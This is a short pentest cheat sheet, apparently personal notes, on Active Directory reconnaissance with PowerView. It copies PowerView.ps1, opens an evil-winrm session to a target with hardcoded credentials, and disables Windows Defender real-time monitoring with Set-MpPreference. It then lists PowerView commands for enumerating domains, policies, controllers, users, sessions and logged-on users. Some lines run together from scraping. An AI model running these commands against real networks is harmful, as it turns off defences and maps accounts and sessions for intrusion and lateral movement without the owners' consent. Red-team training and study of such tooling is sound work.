Power View
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
evil-winrm -i 10.10.10.10 -u redcliff -p "password123" -s .Set-MpPreference -DisableRealtimeMonitoring $true#Get Current Domain:
Get-NetDomain
#Enum Other Domains:
Get-NetDomain -Domain <DomainName>
#Get Domain SID:
Get-DomainSID
#Get Domain Policy:
Get-DomainPolicy
#Will show us the policy configurations of the Domain about system access or kerberos
(Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"
#Get Domain Controlers:
Get-NetDomainController
Get-NetDomainController -Domain <DomainName>
#Enumerate Domain Users:
Get-NetUser
Get-NetUser -SamAccountName <user>
Get-NetUser | select cn
Get-UserProperty
#Check last password change
Get-UserProperty -Properties pwdlastset
#Get a spesific "string" on a user's attribute
Find-UserField -SearchField Description -SearchTerm "redcliff"
#Enumerate user logged on a machine
Get-NetLoggedon -ComputerName <ComputerName>
#Enumerate Session Information for a machine
Get-NetSession -ComputerName <ComputerName>
#Enumerate domain machines of the current/specified domain where specific users are logged into
Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromNameLast updated